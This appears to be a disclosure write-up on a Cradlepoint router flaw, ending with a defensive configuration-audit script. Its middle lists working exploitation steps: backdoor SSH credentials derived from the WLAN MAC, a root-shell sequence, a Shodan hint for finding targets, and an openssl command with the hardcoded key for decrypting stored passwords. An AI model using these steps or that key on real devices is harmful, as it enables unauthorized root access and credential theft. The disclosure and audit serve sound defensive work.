Cradlepoint delivers high-quality networking devices, such as routers, and a cloud platform. It also provides services for business and government organizations. Cradlepoint is also committed to expanding its leadership into the emerging 5G space.
A researcher has found a critical vulnerability in Cradlepoint router devices. The vulnerability has already been reported to Cradlepoint and was fully disclosed in August.
What is the vulnerability?
- A hardcoded password allows you to retrieve sensitive information, including the default password. The default password is the last 8 characters of WLAN_MAC
- Shodan Search
- Escalate privileges using a backdoor account with a hardcoded username and password
- enable ssh login
- set control.system.techsupport_access true
- login with ssh using u:cproot p:1415 + last 4 bytes of WLAN_MAC
- type ‘sh’ to get root shell
How is the password encrypted?
- For passwords in the configuration store starting with "$1", the encrypted password is everything after the last "$"
- The password can be decrypted using: echo [encrypted password] | openssl enc -d -aes-256-cbc -md sha1 -base64 -nosalt -k "NGJkODg1ZGE1NDhhY2ZhY2VmYjM0MDIzZjA0M2YzNTY="
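For defenders, the two points above translate into a configuration audit: any stored value in the "$1...$" format is only reversibly encrypted with a fixed key, so it should be treated as exposed and rotated, and `control.system.techsupport_access` should not be left enabled. The script below is an added example, not code from the researcher or from Cradlepoint; it assumes the configuration store has been exported as a nested JSON-like structure, and the sample data and the names `walk`, `is_reversible_secret` and `audit` are constructed for illustration.

```python
import base64
import binascii

AES_BLOCK = 16  # AES-CBC ciphertext length is always a multiple of 16 bytes


def walk(node, path=""):
    """Yield (dotted_path, value) for every leaf of a nested dict/list."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from walk(value, f"{path}.{key}" if path else str(key))
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from walk(value, f"{path}.{index}")
    else:
        yield path, node


def is_reversible_secret(value):
    """True if value has the '$1...$<base64 AES-CBC blob>' shape described above."""
    if not isinstance(value, str) or not value.startswith("$1"):
        return False
    blob = value.rsplit("$", 1)[1]  # encrypted part is everything after the last '$'
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return False
    return len(raw) > 0 and len(raw) % AES_BLOCK == 0


def audit(config):
    """Return (path, reason) findings without decrypting anything."""
    findings = []
    for path, value in walk(config):
        if path == "control.system.techsupport_access" and value is True:
            findings.append((path, "tech support access is enabled"))
        elif is_reversible_secret(value):
            findings.append((path, "reversibly encrypted secret, rotate it"))
    return findings


# Constructed sample, not taken from a real device; the layout is an assumption.
SAMPLE = {
    "control": {"system": {"techsupport_access": True}},
    "system": {"users": [{"username": "admin",
                          "password": "$1$0$" + base64.b64encode(bytes(16)).decode()}]},
    "wlan": {"ssid": "$1 coffee"},  # starts with $1 but is not a ciphertext
}

if __name__ == "__main__":
    for path, reason in audit(SAMPLE):
        print(f"{path}: {reason}")
```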